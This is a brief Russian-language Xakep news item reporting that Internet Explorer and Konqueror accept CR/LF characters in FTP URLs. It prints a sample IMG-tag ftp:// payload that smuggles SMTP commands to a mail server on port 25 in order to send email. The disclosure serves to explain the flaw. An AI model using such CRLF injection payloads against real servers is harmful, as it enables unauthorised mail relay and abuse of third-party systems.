Отсылка писем через FTP клиенты IE и Konqueror

Рекомендуем почитать:

Xakep #303. Свой Arch Linux

Содержание выпуска
Подписка на «Хакер»-60%

Уязвимости в Internet Explorer и Konqueror позволяют отсылать письма через встроенные FTP клиенты без всякого взаимодействия с пользователем. Оба броузера принимают %0a и %0d в URL, в адресе FTP они так же принимаются в части, в которой указывается имя.

Пример:

http://dsbl.org/testingground/IE-FTP-SMTP-link/

В теге IMG написано

ftp://foo%0d%0aHELO mail%0d%0aMAIL FROM%3a<>%0d%0aRCPT TO%3a %0d%0aDATA%0d%0aSubject%3a hacked%0d%0aTo%3aian%40penguinhosting.net %0d%0a%0d%0ahacked%0d%0a.%0d%0a: bar@mx.penguinhosting.net:25

что позволяет отсылать письма.

Отсылка писем через FTP клиенты IE и Konqueror

Xakep #303. Свой Arch Linux

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Админ-экспресс. Исследуем обход UAC на примере Elevation Moniker

Тотальное отключение. Как грамотно закрыть счета и расстаться с банком

Булавкой по мозгам. Анализируем динамический код при помощи Intel Pin

FLUX.1 и SwarmUI. Генерируем картинки новой открытой моделью

Трюки

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Карманный Arch. Делаем флешку с живым образом Arch Linux

Последние новости

Россиянина приговорили к 40 месяцам тюрьмы за продажу 300 000 учетных данных

Хак-группа OldGremlin возобновила свою активность

Вымогатели RansomHub используют инструмент EDRKillShifter для отключения EDR-защиты

Атака ArtiPACKED может использоваться для захвата GitHub-репозиториев и доступа к облачным средам

В США предложили использовать OSINT для поиска уязвимостей в Astra Linux